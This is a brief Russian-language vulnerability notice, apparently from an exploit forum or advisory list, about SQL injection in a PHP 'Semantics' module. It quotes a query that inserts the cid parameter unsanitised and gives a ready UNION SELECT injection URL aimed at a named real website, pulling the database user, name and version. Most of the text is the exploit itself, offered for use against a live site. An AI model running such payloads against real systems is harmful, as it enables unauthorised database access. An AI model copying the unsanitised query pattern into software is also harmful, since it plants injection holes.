$sql = "SELECT $semanticscolumn[category],
$semanticscolumn[description] FROM $semanticstable WHERE $semanticscolumn[cid] = $cid";
Уязвимый параметр cid
Пример уязвимости:
http://www.astrobio.net/news/index.php?module=Semantics&func=display&cid=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2